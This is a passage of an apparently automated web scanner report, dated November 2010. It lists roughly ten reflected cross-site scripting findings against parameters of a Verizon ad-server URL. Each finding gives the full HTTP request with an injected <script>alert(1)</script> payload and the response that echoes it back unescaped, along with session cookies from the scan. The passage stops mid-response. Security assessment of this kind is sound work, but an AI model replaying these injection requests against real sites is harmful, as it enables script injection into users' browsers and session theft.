GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=b04e9"><script>alert(1)</script>88b43b9e841&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=b04e9"><script>alert(1)</script>88b43b9e841&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.421. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [connex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the connex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95f66"><script>alert(1)</script>944d611ec25 was submitted in the connex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=95f66"><script>alert(1)</script>944d611ec25&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
latformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=95f66"><script>alert(1)</script>944d611ec25&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_
...[SNIP]...

2.422. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [fiostvown parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the fiostvown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc55a"><script>alert(1)</script>061e019d33 was submitted in the fiostvown parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=dc55a"><script>alert(1)</script>061e019d33&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1392
Content-Type: text/html
Cache-Control: private
Content-Length: 1392

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=dc55a"><script>alert(1)</script>061e019d33&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.423. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [fiosvoice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the fiosvoice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12655"><script>alert(1)</script>19403df38df was submitted in the fiosvoice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=12655"><script>alert(1)</script>19403df38df&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=12655"><script>alert(1)</script>19403df38df&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.424. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [msp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the msp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d52"><script>alert(1)</script>08e01549957 was submitted in the msp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=c2d52"><script>alert(1)</script>08e01549957&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=c2d52"><script>alert(1)</script>08e01549957&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.425. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 198e7"><script>alert(1)</script>2bc9a424ec6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&198e7"><script>alert(1)</script>2bc9a424ec6=1 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1402
Content-Type: text/html
Cache-Control: private
Content-Length: 1402

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
rtner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&198e7"><script>alert(1)</script>2bc9a424ec6=1" target="_top">
...[SNIP]...

2.426. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [npa parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the npa request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4037b"><script>alert(1)</script>d2c2ef8cfb7 was submitted in the npa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=4037b"><script>alert(1)</script>d2c2ef8cfb7&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
g/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=4037b"><script>alert(1)</script>d2c2ef8cfb7&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.427. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [nxx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the nxx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14c09"><script>alert(1)</script>9bf55b7778c was submitted in the nxx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=14c09"><script>alert(1)</script>9bf55b7778c&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=14c09"><script>alert(1)</script>9bf55b7778c&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.428. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [online_backup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the online_backup request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd800"><script>alert(1)</script>1fbf2886a4d was submitted in the online_backup parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=dd800"><script>alert(1)</script>1fbf2886a4d&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ty=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=dd800"><script>alert(1)</script>1fbf2886a4d&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.429. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [partner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd4b8"><script>alert(1)</script>f43c1bd4bbd was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=bd4b8"><script>alert(1)</script>f43c1bd4bbd&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=bd4b8"><script>alert(1)</script>f43c1bd4bbd&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" targe
...[SNIP]...

2.430. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popcity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popcity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 770a4"><script>alert(1)</script>1e832059d7 was submitted in the popcity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=770a4"><script>alert(1)</script>1e832059d7&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:12:54 GMT
Server: Apache/2.0.52 (Red Hat)
